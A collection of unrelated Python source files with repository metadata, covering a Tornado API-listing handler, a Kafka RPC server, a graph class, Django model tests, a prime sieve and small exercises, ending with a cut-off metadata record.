2f7e71483216ad096d16af31c29b784bdccfbeb7
|
bcb03a2623fc71ef01000a96e524333513b6d138
|
refs/heads/dev
| 2023-08-18T08:22:34.744733
| 2019-09-07T02:18:06
| 2019-09-07T02:18:06
| 198,781,206
| 1
| 0
| null | 2023-08-14T21:51:09
| 2019-07-25T07:32:13
|
CSS
|
UTF-8
|
Python
| false
| false
| 3,886
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@desc: 首页
@time: 2018/6/23
"""
from operator import itemgetter
from os import path
from controller.base import BaseHandler
from controller.role import get_route_roles
import re
import inspect
class InvalidPageHandler(BaseHandler):
def prepare(self):
pass # ignore roles
def get(self):
req_path = self.request.path
if '/api/' in req_path:
self.set_status(404, reason='Not found')
return self.finish()
if len(req_path) > 1 and path.exists(path.join(self.get_template_path(), req_path.replace('/', ''))):
return self.render(req_path.replace('/', ''))
self.set_status(404, reason='Not found')
self.render('_404.html')
def post(self):
self.get()
class ApiTable(BaseHandler):
URL = '/api'
def get(self):
""" 显示后端API和前端路由 """
def get_doc():
assert func.__doc__, str(func) + ' no comment'
return func.__doc__.strip().split('\n')[0]
handlers = []
for cls in self.application.handlers:
handler = cls(self.application, self.request)
file = 'controller' + re.sub(r'^.+controller', '', inspect.getsourcefile(cls))
file += '\n' + inspect.getsource(cls).split('\n')[0][:-1]
for method in handler._get_methods().split(','):
method = method.strip()
if method != 'OPTIONS':
func = cls.__dict__[method.lower()]
func_name = re.sub(r'<|function |at .+$', '', str(func)).strip()
self.add_handlers(cls, file, func_name, get_doc, handlers, method)
handlers.sort(key=itemgetter(0))
self.render('_api.html', version=self.application.version, handlers=handlers)
@staticmethod
def add_handlers(cls, file, func_name, get_doc, handlers, method):
def show_roles(roles):
if 'MyTaskHandler.' in func_name:
return '普通用户'
return ','.join(r for r in roles if not re.search(r'员|专家', r) or '普通用户' not in roles)
def add_handler(url, idx=0):
added = 0
if '@box_type' in url:
for s, box_type in enumerate(['block', 'char', 'column', 'text']):
sub_url = url.replace('@box_type', box_type)
roles = get_route_roles(sub_url, method)
if roles:
added += len(roles)
handlers.append((sub_url, func_name, idx * 10 + s + 1, file, get_doc(), show_roles(roles)))
if not added:
roles = get_route_roles(url, method)
handlers.append((url, func_name, idx, file, get_doc(), show_roles(roles)))
if isinstance(cls.URL, list):
for i, url_ in enumerate(cls.URL):
add_handler(url_, i + 1)
else:
add_handler(cls.URL)
class ApiSourceHandler(BaseHandler):
URL = '/api/code/(.+)'
def get(self, name):
""" 显示后端API的源码 """
for cls in self.application.handlers:
handler = cls(self.application, self.request)
for method in handler._get_methods().split(','):
method = method.strip()
if method != 'OPTIONS':
func = cls.__dict__[method.lower()]
func_name = re.sub(r'<|function |at .+$', '', str(func)).strip()
if func_name == name:
file = 'controller' + re.sub(r'^.+controller', '', inspect.getsourcefile(cls))
src = inspect.getsource(cls).strip()
return self.render('_api_src.html', name=name, file=file, src=src)
self.render('_error.html', code=404, message=name + '不存在')
|
[
"rhcad@hotmail.com"
] |
rhcad@hotmail.com
|
8d44e6495866ff65d6d79b08f18b96420fd02105
|
b3ec5214dc326751ca89ae6c410ad9df5550d727
|
/全局变量.py
|
cd1394044b1adb9e842f51e11e740e8d1000cb9e
|
[] |
no_license
|
Ephemeral1026/python-
|
c77cae6ad93fcd8847de8da2e845de3e071d4c73
|
8c27f79f40c3efe43eb585779c4afaf52409c2cf
|
refs/heads/master
| 2020-04-17T13:43:50.642080
| 2019-02-28T06:31:26
| 2019-02-28T06:31:26
| 166,627,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 140
|
py
|
x=2
def fun1():
print(x,end=" ")
def fun2():
global x
x=x+1
print(x,end=" ")
fun1()
fun2()
print(x,end=" ")
|
[
"noreply@github.com"
] |
Ephemeral1026.noreply@github.com
|
6f866edffe692f8f5ccb9945f336a75fdfccb83d
|
e9e0b9f0de4751ba734c75745e6be24d7609af05
|
/CodeGenServer.py
|
ab710ae85f2f6d24ac0174f560808a6903ff7ae7
|
[] |
no_license
|
pnjha/RPC-Kafka
|
4f62e64aec4120c05265ddc9f98b4a421108a09c
|
55c8c88a67f50613d04922ecda792e6a39b9bb93
|
refs/heads/master
| 2022-04-05T17:22:58.995627
| 2020-02-09T14:28:54
| 2020-02-09T14:28:54
| 239,317,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,010
|
py
|
import os
import sys
import json
import pickle
import threading as th
from kafka import KafkaProducer
from kafka import KafkaConsumer
from kafka.errors import KafkaError
from Server import Server as Server
def produce_topic(topic_name,receiver_id,value,kafka_id):
producer = KafkaProducer(retries=5,bootstrap_servers=kafka_id,key_serializer=lambda m: json.dumps(m).encode('utf-8'),value_serializer=lambda m: json.dumps(m).encode('utf-8'))
producer.send(topic_name,key=receiver_id,value=value)
producer.flush()
print(value)
def consume_topic(function_name,server_id):
consumer = KafkaConsumer(function_name,group_id=server_id,bootstrap_servers=server_id,key_deserializer=lambda m: json.loads(m.decode('utf-8')),value_deserializer=lambda m: json.loads(m.decode('utf-8')))
server_impl_obj = Server()
for message in consumer:
if message.key == server_id:
client_id = message.value["id"]
request = message.value["param_value"]
function = getattr(server_impl_obj,function_name)
val = function(**request)
reply = {}
reply['response_value'] = val
produce_topic(function_name,client_id,reply,server_id)
def main(server_id,server_IP,server_port):
temp_funtions_list = dir(Server)
functions_list = []
for item in temp_funtions_list:
if "__" not in item:
functions_list.append(item)
reply = {}
reply["functions_list"] = functions_list
produce_topic("functions_list","default",reply,server_id)
for function_name in functions_list:
th.Thread(target=consume_topic, args=(function_name,server_id)).start()
if __name__ == '__main__':
if len(sys.argv) != 3:
print ("Invalid argument format\n Correct usage:python3 [filename][IP Address][Port Number]")
exit()
server_IP = str(sys.argv[1])
server_port = str(sys.argv[2])
server_id = server_IP+":"+server_port
main(server_id,server_IP,server_port)
|
[
"prakash.nath@students.iiit.ac.in"
] |
prakash.nath@students.iiit.ac.in
|
11d15ed90725ea8f612d4328b52f560ef8e3e3bf
|
af30e0e378a0028a1d65951491174b6bc685e4c6
|
/11399.py
|
33cbfe96bd38692392db2092bae493af0dab4783
|
[] |
no_license
|
JungAh12/BOJ
|
cb54cfddc041b3b807b1c98d5327d717f9a325fb
|
709ff8f909aa686fe83c7b25d5f30445a50fbb7d
|
refs/heads/master
| 2020-09-11T01:04:47.310521
| 2019-11-29T16:15:49
| 2019-11-29T16:15:49
| 221,888,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
N = int(input())
P = list(map(int,input().split(' ')))
P = sorted(P)
res = 0
for i in range(N):
res += sum(P[:i+1])
print(res)
|
[
"vml_yg@naver.com"
] |
vml_yg@naver.com
|
13e49560092f02899f60735a3e9a929d4b2522a9
|
3247e4a00da2e46834a18fe5b77e0d11a0d1b2b2
|
/8.1_Graph.py
|
27ef10bffef824bfa9b6873b122097d92d68cb20
|
[] |
no_license
|
kriyazhao/Python-DataStructure-Algorithms
|
90ab0e179143480b377a544b2595a5cc49120141
|
c7255d5f6c461e18c43c472299269a771779b500
|
refs/heads/master
| 2021-01-20T09:09:44.938910
| 2014-07-15T00:44:29
| 2014-07-15T00:44:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,950
|
py
|
#------------------------------------------------------------------------------------------------------------
# Vertex class to store node in the graph
class Vertex:
def __init__(self, key):
self.id = key
self.connectedTo = {} # store connected vertex and weight of the edge
self.distance = 0
self.pred = None
self.color = "white"
self.disTime = 0
self.finTime = 0
def addNeighbor(self, nbr, weight = 0):
self.connectedTo[nbr] = weight
def __str__(self):
return str(self.id) + " is connected to: " + str([x.id for x in self.connectedTo])
def getConnections(self):
return self.connectedTo.keys()
def getID(self):
return self.id
def getWeight(self, nbr):
return self.connectedTo[nbr]
def getDistance(self):
return self.distance
def setDistance(self, dis):
self.distance = dis
def getPred(self):
return self.pred
def setPred(self, predVert):
self.pred = predVert
def getColor(self):
return self.color
def setColor(self, color):
self.color = color
def getDiscovery(self):
return self.disTime
def setDiscovery(self, time):
self.disTime = time
def getFinish(self):
return self.finTime
def setFinish(self, time):
self.finTime = time
#------------------------------------------------------------------------------------------------------------
# Graph class
class Graph:
def __init__(self):
self.vertList = {}
self.vertCount = 0
def addVertex(self, key):
if key in self.vertList:
raise KeyError
else:
self.vertCount += 1
newVertex = Vertex(key)
self.vertList[key] = newVertex
def getVertex(self, key):
if key in self.vertList:
return self.vertList[key]
else:
return None
def __contains__(self, key):
return key in self.vertList
def addEdge(self, fromVert, toVert, cost = 0):
if fromVert not in self.vertList:
self.addVertex(fromVert)
if toVert not in self.vertList:
self.addVertex(toVert)
self.vertList[fromVert].addNeighbor(self.vertList[toVert], cost)
def getVertices(self):
return self.vertList.keys()
def __iter__(self):
return iter(self.vertList.values())
myGragh = Graph()
for i in range(6):
myGragh.addVertex(i)
for vertID in myGragh:
print vertID.id
myGragh.addEdge(0,1,5)
myGragh.addEdge(0,5,2)
myGragh.addEdge(1,2,4)
myGragh.addEdge(2,3,9)
myGragh.addEdge(3,4,7)
myGragh.addEdge(3,5,3)
myGragh.addEdge(4,0,1)
myGragh.addEdge(5,4,8)
myGragh.addEdge(5,2,1)
for vert in myGragh:
for connection in vert.getConnections():
print "{0} is connected to {1} with a cost of {2}".format(vert.getID(), connection.getID(),vert.getWeight(connection))
|
[
"kriyazhao@users.noreply.github.com"
] |
kriyazhao@users.noreply.github.com
|
c7771f3e6c54d6ad3a33c0e804aac0782acc4220
|
836d5f7190f6b4503e758c87c71598f18fdfce14
|
/9-String-İşlemleri/String-Find-Rfind-Methodu.py
|
476d3632d57bd5f8e65d24e5cbc90a8fe7081687
|
[] |
no_license
|
S-Oktay-Bicici/PYTHON-PROGRAMMING
|
cf452723fd3e7e8ec2aadc7980208d747c502e9a
|
22e864f89544249d6309d6f4570a4104bf47346b
|
refs/heads/main
| 2021-11-30T00:19:21.158084
| 2021-11-16T15:44:29
| 2021-11-16T15:44:29
| 316,716,147
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
#####################################################################
a = "sadık oktay biçici"
#string içerisinde aranan karakterin kaçıncı sırada olduğunu bulmamıza yarar
#soldan sağa arama yapar
print(a.find("ı"))
#istedğimiz aralıkda aramak istersek
print(a.find("t",2,14))
#####################################################################
a = "sadık oktay biçici"
#find methodunun tersi olarak sağdan sola doğru okur
print(a.rfind("t"))
#####################################################################
|
[
"noreply@github.com"
] |
S-Oktay-Bicici.noreply@github.com
|
02be514a10bdb2a7ec4770600dfb54abf2a86aa7
|
bf14a56f2f03a99a87bf455c3c4a5be9760c9db6
|
/users/migrations/0005_remove_members_auth.py
|
40033fa617189c47240b28acbda9095fdf2c9f67
|
[] |
no_license
|
axxsxbxx/T4IR_petppo
|
84833e4096052023fb633111fa57a623009fbcad
|
ecf8e890bbb20bad7f41d0c76908fa1e27c6eda0
|
refs/heads/master
| 2023-01-07T05:16:39.466043
| 2020-11-12T09:43:02
| 2020-11-12T09:43:02
| 291,868,850
| 0
| 0
| null | 2020-09-04T05:50:04
| 2020-09-01T01:53:34
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 317
|
py
|
# Generated by Django 3.1 on 2020-09-03 00:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0004_members_auth'),
]
operations = [
migrations.RemoveField(
model_name='members',
name='auth',
),
]
|
[
"ansubin2004@gmail.com"
] |
ansubin2004@gmail.com
|
da8a1916b309ed9a259ff22ed0d10c83f5ba5a33
|
b2329ecbfc753142659b59d84b3bc9b6f9a035d2
|
/app.py
|
02b8d781db3fa0ac2431b16741aeffa9f58e0aa7
|
[] |
no_license
|
SantoshAIMLProjects/Invoice_Processing
|
a93c2742f7d2d43fe85f3c08901c50a2c3a34207
|
7e18b6f486e2d5be949316ca1595898afafcfe0e
|
refs/heads/master
| 2023-09-02T20:27:38.436505
| 2021-11-14T19:42:11
| 2021-11-14T19:42:11
| 427,994,350
| 0
| 0
| null | 2021-11-14T19:42:11
| 2021-11-14T17:26:52
|
Python
|
UTF-8
|
Python
| false
| false
| 2,244
|
py
|
import streamlit as st
import pandas as pd
from matplotlib import pyplot as plt
from plotly import graph_objs as go
from extract_img import *
from PIL import Image
data = pd.read_csv("output1.csv")
st.title("Invoice Processing")
#roi = [[(1073, 95), (1199, 115), 'Text', 'Company_Name'],
# [(109, 350), (207, 378), 'Text', 'Invoice_Date'],
# [(994, 350), (1091, 378), 'Text', 'Invoice_Number'],
# [(1000, 230), (1141, 246), 'Text', 'Mobile_Number']]
roi= [[(84, 74), (269, 92), 'Text', 'Company_Name'],
[(89, 226), (252, 258), 'Text', 'Invoice_Number'],
[(694, 226), (882, 257), 'Text', 'Invoice_Date'],
[(133, 118), (225, 134), 'Text', 'Mobile_Number']]
def main():
st.header("AI Invoice Processing")
#st.write("Main function")
nav = st.sidebar.radio("Navigation",['Home','Extract','Analytics'])
if nav == 'Home':
st.write("We are processing invoices and extracting some fileds and storing in Database.Also we verify with source system")
elif nav == 'Extract':
input_img = st.file_uploader("Please upload image file.....")
if input_img is not None:
img = Image.open(input_img)
img_arr = np.array(img)
img_gray = cv2.cvtColor(img_arr,cv2.COLOR_BGR2GRAY)
threshold_img = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
#img = input_img.copy()
#st.write(type(img_arr))
st.image(img_arr,caption='Input Invoice')
st.image(img_gray,caption='Gray Invoice')
st.image(threshold_img,caption ='Threshold Image')
#preprocess_img= preprocess_image(img_gray)
#st.image(preprocess_img,caption='Pre-Processed Invoice')
#st.image(preprocess_image(input_img))
extract_img(threshold_img,roi)
print("Data extraction completed")
#path = st.file_uploader("Input the file path")
option = st.selectbox("Please select one",("Eng_To_Eng","Eng_To_Ara","Ara_To_Ara","Ara_To_Eng"))
if st.checkbox("Show Data"):
st.table(data)
elif nav == 'Analytics':
st.write("We show analytics of our app")
if __name__ == '__main__':
main()
|
[
"apple@Apples-MacBook-Pro.local"
] |
apple@Apples-MacBook-Pro.local
|
fdf6431a2bb9ec7423502542bfc62b42f6cdd1cc
|
1000b899b480c90308cb2424391cbd5bdc18b03a
|
/emails/forms.py
|
d41e657c0301378e786bbb7d9317c5620faf0dde
|
[] |
no_license
|
crazy36/Emails-app
|
685891cebbc6756c5ab9a4b2d371451d2acd2a0e
|
15daa27f82617598611ba84fc897cc4584075684
|
refs/heads/master
| 2020-03-18T16:17:29.730927
| 2018-05-26T11:58:47
| 2018-05-26T11:58:47
| 134,957,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 613
|
py
|
#emails/forms.py
# -*- coding: UTF-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
class MessageForm(forms.Form):
recipient=forms.ModelChoiceField(label=_("Recipient"),queryset=User.objects.all(),required=True,)
message=forms.CharField(label=_("Message"),widget=forms.Textarea,required=True,)
def __init__(self,request,*args,**kwargs):
super(MessageForm,self).__init__(*args,**kwargs)
self.request=request
self.fields['recipient'].queryset=\
self.fields['recipient'].queryset.\
exclude(pk=request.user.pk)
|
[
"crazyhero365@gmail.com"
] |
crazyhero365@gmail.com
|
b8a9302e8da44e7a908893ab4b7e4f14686ddd21
|
bcb8337b488f6acb91b700a2312a5b2018855413
|
/federatedml/ftl/test/functional_test/functional_load_data_test.py
|
ac35eff06742ae316f8a3664bb6393b32ad11a34
|
[
"Apache-2.0"
] |
permissive
|
freeeedooom/FATE
|
d17a4729f059cfec6bc07c3142bebcd3b470dc3c
|
7bbce8ee037543f280791378681742b40a300b0a
|
refs/heads/master
| 2020-08-19T12:15:22.517131
| 2019-10-17T07:09:22
| 2019-10-17T07:09:22
| 215,918,890
| 1
| 0
|
Apache-2.0
| 2019-10-18T01:45:43
| 2019-10-18T01:45:43
| null |
UTF-8
|
Python
| false
| false
| 1,919
|
py
|
import numpy as np
from arch.api.eggroll import init
from federatedml.ftl.data_util.common_data_util import load_data, feed_into_dtable
from federatedml.ftl.test.util import assert_array, assert_matrix
if __name__ == '__main__':
expected_ids = np.array([133, 273, 175, 551, 199, 274])
expected_y = np.array([1, 1, 1, 1, -1, -1])
expected_X = np.array([[0.254879, -1.046633, 0.209656, 0.074214, -0.441366, -0.377645],
[-1.142928, - 0.781198, - 1.166747, - 0.923578, 0.62823, - 1.021418],
[-1.451067, - 1.406518, - 1.456564, - 1.092337, - 0.708765, - 1.168557],
[-0.879933, 0.420589, - 0.877527, - 0.780484, - 1.037534, - 0.48388],
[0.426758, 0.723479, 0.316885, 0.287273, 1.000835, 0.962702],
[0.963102, 1.467675, 0.829202, 0.772457, - 0.038076, - 0.468613]])
infile = "../../../../examples/data/unittest_data.csv"
ids, X, y = load_data(infile, 0, (2, 8), 1)
ids = np.array(ids, dtype=np.int32)
X = np.array(X, dtype=np.float64)
y = np.array(y, dtype=np.int32)
print("ids shape", ids.shape)
print("X shape", X.shape)
print("y shape", y.shape)
assert_array(expected_ids, ids)
assert_array(expected_y, y)
assert_matrix(expected_X, X)
expected_data = {}
for i, id in enumerate(expected_ids):
expected_data[id] = {
"X": expected_X[i],
"y": expected_y[i]
}
init()
data_table = feed_into_dtable(ids, X, y.reshape(-1, 1), (0, len(ids)), (0, X.shape[-1]))
for item in data_table.collect():
id = item[0]
inst = item[1]
expected_item = expected_data[id]
X_i = expected_item["X"]
y_i = expected_item["y"]
features = inst.features
label = inst.label
assert_array(X_i, features)
assert y_i == label
|
[
"jicezeng@gmail.com"
] |
jicezeng@gmail.com
|
66f5307ace7c6521c16e10552a93770a9dd8774b
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_10/100.py
|
2dbfeb80c477a2f752aaf4706fd43b0a463f8780
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,232
|
py
|
from __future__ import with_statement
from optparse import OptionParser
import sys
def process(in_file, out_file):
num_cases = int(in_file.readline())
for case in xrange(1, num_cases+1):
print 'Case #%d:' % case
result = 0
p, k, l = [int(x) for x in in_file.readline().split(' ')]
#print p, k, l
frequencies = sorted([int(x) for x in in_file.readline().split(' ')])
i, place = 0, 0
for f in reversed(frequencies):
if i % k == 0:
place += 1
result += place * f
i += 1
out_file.write('Case #%d: %d\n' % (case, result))
def main():
parser = OptionParser(usage="""\
Usage: %prog [options]""")
parser.add_option('-i', '--input_file',
type='string', action='store')
parser.add_option('-o', '--output_file',
type='string', action='store')
opts, args = parser.parse_args()
if not opts.input_file or not opts.output_file:
parser.print_help()
sys.exit(1)
with open(opts.input_file, 'r') as i:
with open(opts.output_file, 'w') as o:
process(i, o)
if __name__ == '__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
3aa0c8ef351c4ec055091dc563483f9b0ffaca94
|
af05499aed459da984b0ce93e6424aa74766ba62
|
/turtle/initial.py
|
ad3e12fd07e584262a0c5eaebae0bb1cc3744b18
|
[] |
no_license
|
alxayeed/Programming-Foundations-with-Python
|
72fd64e928941637e6c320b00c218e627c3faa71
|
eca4c67a011a2b6e9964cf7df0cd8c0486272daf
|
refs/heads/master
| 2020-07-06T20:09:56.073152
| 2019-08-14T14:11:09
| 2019-08-14T14:11:09
| 203,127,026
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84
|
py
|
#A program to graphically show my Initial
import tutle
name = turtle.Turtle()
name
|
[
"alxayeed@gmail.com"
] |
alxayeed@gmail.com
|
a3c62b7908f21f4cd6024e83cfc4a6a3eaa23fc8
|
cbbd094c5a8b6cf2d3f41fdf114c3988d85ec572
|
/caso voley/Sexo.py
|
e298f945c76fc1605a49cfb10e95f7aaae5c53d5
|
[] |
no_license
|
JhonTorres001/-Caso-voley-
|
c96add61f3efd1523a7c2ca6c878952f14ec1e76
|
9ffbeedb838684fc8f7e81b7791b8ecf90410147
|
refs/heads/master
| 2022-12-08T08:31:19.745461
| 2020-08-31T22:49:55
| 2020-08-31T22:49:55
| 291,840,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
class Sexo(object):
def __init__(self):
self.Descripcion = ""
self.IdSexo = 0
self.persona = None
# Start of user code -> properties/constructors for Sexo class
# End of user code
# Start of user code -> methods for Sexo class
# End of user code
|
[
"tomcat@ip-172-31-19-198.eu-west-1.compute.internal"
] |
tomcat@ip-172-31-19-198.eu-west-1.compute.internal
|
2b300e5644cfb953674e2fc0496acc9e2812c030
|
6fa40af69b8cc2ccaa974851ee7d9d0fe0056931
|
/app/core/tests/test_models.py
|
18cff09bd48363bd924ae44825eea87f48e763f3
|
[
"MIT"
] |
permissive
|
Bartosz-L/recipe-app_django-rest-api
|
5bef77711e53fb2a5d4c09731085e5af067fc2ac
|
b87abc8db57c228aa2181c91731bd8ea6cbd233a
|
refs/heads/master
| 2022-11-29T22:15:14.081191
| 2019-11-05T13:14:52
| 2019-11-05T13:14:52
| 185,169,273
| 0
| 0
|
MIT
| 2022-11-22T04:09:13
| 2019-05-06T09:50:15
|
Python
|
UTF-8
|
Python
| false
| false
| 2,615
|
py
|
from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@test.com', password='testpassword'):
# create a sample user
return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
# test creating a new user with an email is successful
def test_create_user_with_email_successful(self):
email = 'test@test.com'
password = 'TestP@ssword123'
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
# test the email for a new user is normalized
def test_new_user_email_normalized(self):
email = 'test@TEST.COM'
user = get_user_model().objects.create_user(email, 'test123')
self.assertEqual(user.email, email.lower())
# test creating user with no email raises error
def test_new_user_invalid_email(self):
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_superuser(self):
user = get_user_model().objects.create_superuser(
'test@test.com',
'test123'
)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
def test_tag_str(self):
# test the tag string representation
tag = models.Tag.objects.create(
user=sample_user(),
name='Vegan'
)
self.assertEqual(str(tag), tag.name)
def test_ingredient_str(self):
# test the ingredient string representation
ingredient = models.Ingredient.objects.create(
user=sample_user(),
name='Cucumber'
)
self.assertEqual(str(ingredient), ingredient.name)
def test_recipe_str(self):
# test the recipe string respresentation
recipe = models.Recipe.objects.create(
user=sample_user(),
title='Steak and mushroom sauce',
time_minutes=5,
price=5.00
)
self.assertEqual(str(recipe), recipe.title)
@patch('uuid.uuid4')
def test_recipe_file_name_uuid(self, mock_uuid):
# test that image is saved in the correct location
uuid = 'test-uuid'
mock_uuid.return_value = uuid
file_path = models.recipe_image_file_path(None, 'myimage.jpg')
exp_path = f'uploads/recipe/{uuid}.jpg'
self.assertEqual(file_path, exp_path)
|
[
"bligeza@tidk.pl"
] |
bligeza@tidk.pl
|
0e5e5b102ac23f3e61ac0c30aeb4a7aab83ba124
|
4f6fdd0effc474226b75ccc5d247509121b90fdf
|
/number programs/prime numbers in a range using sieve of eratosthenes.py
|
345af39b62771b7ab9eff038c23fc4ba11236ff4
|
[] |
no_license
|
tuhiniris/Python-ShortCodes-Applications
|
1580785a6922c70df3b7375cb81e98f4a684d86f
|
f3fe7ac1c11a631fcd05b9d19b25b1a841d94550
|
refs/heads/main
| 2023-04-07T21:42:21.094545
| 2021-04-21T07:47:46
| 2021-04-21T07:47:46
| 358,605,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
##n=int(input("Enter upper limit of range: "))
##sieve=set(range(2,n+1))
##while sieve:
## prime=min(sieve)
## print(prime,end="\t")
## sieve-=set(range(prime,n+1,prime))
##
##print()
N=int(input("Input the value of N: "))
Primes=[True for k in range(N+1)]
p=2
Primes[1]=False
Primes[0]=False
while(p*p<=N):
if Primes[p]==True:
for j in range(p*p,N+1,p):
Primes[j]=False
p+=1
for i in range(2,N):
if Primes[i]:
print(i,end=' ')
|
[
"noreply@github.com"
] |
tuhiniris.noreply@github.com
|
21fa8e09e692dd0fa8a2eb21bacd409ae98bd920
|
cedfd8fb58763f2b57575b92a3b4fcb73ac5d35d
|
/flak.py
|
158723d5259c11ebb88b8b9f8fe81048921ce4b7
|
[] |
no_license
|
Alex-Huleatt/Fun
|
48d0c5004168479596c03210ab4d5cb8ffdbb92e
|
3764e07d38af8ad51ee662a355d691c358346109
|
refs/heads/master
| 2021-01-16T20:24:40.906388
| 2017-08-25T16:19:56
| 2017-08-25T16:19:56
| 100,203,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
#!/usr/bin/env python
import sys
def e(c):
u,b,i,v,s='[{<(',dict,0,0,e.s
z=b(zip(u,']}>)'))
while i<len(c):
k=c[i];h=k in z
if h and c[i+1]==z[k]:exec b(zip(u,['v+=x','v+=s[e.a].pop()if s[e.a]else 0','e.a=1-e.a','v+=1']))[k]
elif h:
n,y=0,i
while c[:i+1].count(k)>c[:i+1].count(z[k]):i+=1
r=c[y+1:i]
if k!='{':n=e(r)
exec b(zip(u,['n=-n','while s[e.a]and s[e.a][-1]:v+=e(r)','n','s[e.a]+=[n]']))[k]
v+=n
i+=1
return v
e.s,e.a=[map(int,sys.argv[2:]),[]],0
e(sys.argv[1])
for s in e.s[e.a]:print s
|
[
"alexhuleatt@Alexanders-MacBook-Pro.local"
] |
alexhuleatt@Alexanders-MacBook-Pro.local
|
0f6345d0f5daccc153be1ada859f3ad57db4dc02
|
3015b07ab56da859507abc3881385f4995980600
|
/fisher/view_models/gift.py
|
34dcb36fd285f7c38d45f5b1ee0e45cbc0245c56
|
[] |
no_license
|
xuewen1696/fisher-book-practice
|
f65c559651f5a51d08cfdcb96a4fc8f96f481238
|
93ce16de333381196aaa2de4811559d5c27d7e0c
|
refs/heads/master
| 2022-12-10T06:31:25.912229
| 2018-07-28T07:26:32
| 2018-07-28T07:26:32
| 142,654,555
| 0
| 1
| null | 2022-12-08T02:22:41
| 2018-07-28T06:53:34
|
CSS
|
UTF-8
|
Python
| false
| false
| 929
|
py
|
from collections import namedtuple
from fisher.view_models.book import BookViewModel
# MyGift = namedtuple('MyGift', ['id', 'book', 'count'])
class MyGifts:
def __init__(self, wish_count_list, gifts_of_mine):
self.gifts = []
self.__wish_count_list = wish_count_list
self.__gifts_of_mine = gifts_of_mine
self.gifts = self.__parse()
def __parse(self):
temp_gifts = []
for gift in self.__gifts_of_mine:
my_gift = self.__matching(gift)
temp_gifts.append(my_gift)
return temp_gifts
def __matching(self, gift):
count = 0
for wish_count in self.__wish_count_list:
if gift.isbn == wish_count.isbn:
count = wish_count['count']
r = {
'id': gift.id,
'book': BookViewModel(gift.book),
'count': count
}
my_gift = r
return my_gift
|
[
"xuewen1696@163.com"
] |
xuewen1696@163.com
|
867a075faec0fc3a81c60d0365a6e18d2b25319b
|
233a63dfe44263826770b5969c7fc228bc5bb0c2
|
/GUI_version/evolve_func.py
|
8730257849b727effaa823f95181e49c1b8de17b
|
[] |
no_license
|
kawin7538/GameOfLife
|
4c65c1af138d653276493c8f00c3cb3ab2be70ca
|
96b6227f7e08d4460041281694c735666d6c12ad
|
refs/heads/master
| 2020-05-19T11:09:17.739863
| 2019-05-12T11:18:56
| 2019-05-12T11:18:56
| 184,984,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,927
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat May 4 15:57:55 2019
@author: Kawin-PC
"""
def evolve(grid):
#initialize liveCells as empty list
liveCells=list()
#access every cells in grid
for i in range(grid.numRows()):
for j in range(grid.numCols()):
#count neighbors that is LIVE CELL around (i,j)
neighbors=grid.numLiveNeighbors(i,j)
#if neighbors is 2 and (i,j) has live or neighbors is 3
if (neighbors==2 and grid.isLiveCell(i,j)) or neighbors==3:
#this cell will live in next turn
liveCells.append((i,j))
#configure grid with new live Cell
grid.configure(liveCells)
def evolve_v2(grid):
#initialize liveCells as empty set
liveCells=set()
#initial unknown cell as empty set
unknownCells=set()
#iteration in every item in liveDict
for key,_ in grid._liveDict.items():
#add all dead cell around this live cell to unknownCells
unknownCells.update([(i,j) for j in range(max(0,key[1]-1),min(key[1]+1\
,grid.numCols()-1)+1) for i in range(max(0,key[0]\
-1),min(key[0]+1,grid.numRows()-1)+1) if not grid.isLiveCell(i,j)])
#find number of neighbors around this cell
neighbors=grid.numLiveNeighbors(key[0],key[1])
#check neighbors from condition , if true then add to liveCells
if (neighbors==2 and grid.isLiveCell(key[0],key[1])) or neighbors==3:
liveCells.add(key)
#iteration in every unknownCells
for i,j in unknownCells:
#find neighbors of this cell
neighbors=grid.numLiveNeighbors(i,j)
#check condition with neighbors , if true then add to liveCells
if (neighbors==2 and grid.isLiveCell(i,j)) or neighbors==3:
liveCells.add((i,j))
#configure grid with liveCells
grid.configure(list(liveCells))
|
[
"kawin7538@gmail.com"
] |
kawin7538@gmail.com
|
1ca07427f06ff0b0545654fdeef1e43c4a964979
|
48e32d67b984fc7505a9b1556b0273cede2848e4
|
/ske_customization/customizations_for_ske/doctype/hypothecation_company/test_hypothecation_company.py
|
113f06e4d851848165fc922c74859c9a40d5562b
|
[
"MIT"
] |
permissive
|
akshay83/ske_customization
|
86c776d37000ed97ddee63bb5ee84901d610414a
|
910e8ca88ffc83554ebb23f7480901dba9f08221
|
refs/heads/master
